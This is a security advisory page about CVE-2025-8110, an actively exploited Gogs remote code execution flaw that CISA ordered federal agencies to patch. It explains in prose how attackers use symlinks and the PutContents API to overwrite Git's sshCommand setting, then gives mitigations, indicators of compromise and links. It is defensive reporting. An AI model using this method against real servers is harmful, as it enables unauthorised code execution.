top of page
perceptive_background_267k.jpg

CISA orders feds to patch Gogs RCE flaw exploited in zero-day attacks

Published:

12 January 2026 at 20:09:16

Alert date:

12 January 2026 at 21:02:40

Source:

bleepingcomputer.com

Click to open the original link from this advisory

Zero-Day Vulnerabilities, Web Technologies, Supply Chain & Dependencies

CISA has ordered federal agencies to patch a high-severity remote code execution (RCE) vulnerability in Gogs that has been actively exploited in zero-day attacks. The vulnerability allows attackers to execute arbitrary code on affected systems. Government agencies are required to secure their systems against this actively exploited flaw. The exploitation in the wild makes this a critical security issue requiring immediate attention from organizations using Gogs software.

Technical details

CVE-2025-8110 is a remote code execution vulnerability in Gogs stemming from a path traversal weakness in the PutContents API. It allows authenticated attackers to bypass protections for a previously patched RCE bug (CVE-2024-55947) by overwriting files outside the repository via symbolic links. Attackers create repositories containing symbolic links pointing to sensitive system files, then write data through the symlink using the PutContents API to overwrite targets outside the repository. By overwriting Git configuration files, specifically the sshCommand setting, threat actors can force target systems to execute arbitrary commands.

Mitigation steps:

Apply patches released by Gogs maintainers that add symlink-aware path validation at all file-write entry points. Disable the default open-registration setting immediately. Limit server access using a VPN or an allow list. Check for signs of compromise by looking for suspicious use of the PutContents API and repositories with random eight-character names. Federal agencies must patch by February 2, 2026. Follow applicable BOD 22-01 guidance for cloud services or discontinue use if mitigations are unavailable.

Affected products:

Gogs (Git service written in Go)

Related links:

https://nvd.nist.gov/vuln/detail/CVE-2025-8110
https://github.com/gogs/gogs/pull/8078
https://github.com/gogs/gogs/commit/553707f3fd5f68f47f531cfcff56aa3ec294c6f6
https://www.bleepingcomputer.com/news/security/unpatched-gogs-zero-day-rce-flaw-actively-exploited-in-attacks/
http://www.shodan.io/search?query=http.title%3A%22Sign+In+-+Gogs%22
https://www.cisa.gov/news-events/alerts/2026/01/12/cisa-adds-one-known-exploited-vulnerability-catalog
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=+CVE-2025-8110
https://www.cisa.gov/news-events/directives/federal-civilian-executive-branch-agencies-list

Related CVE's:

Related threat actors:

IOC's:

Suspicious use of the PutContents API, Repositories with random eight-character names created during attack waves

This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page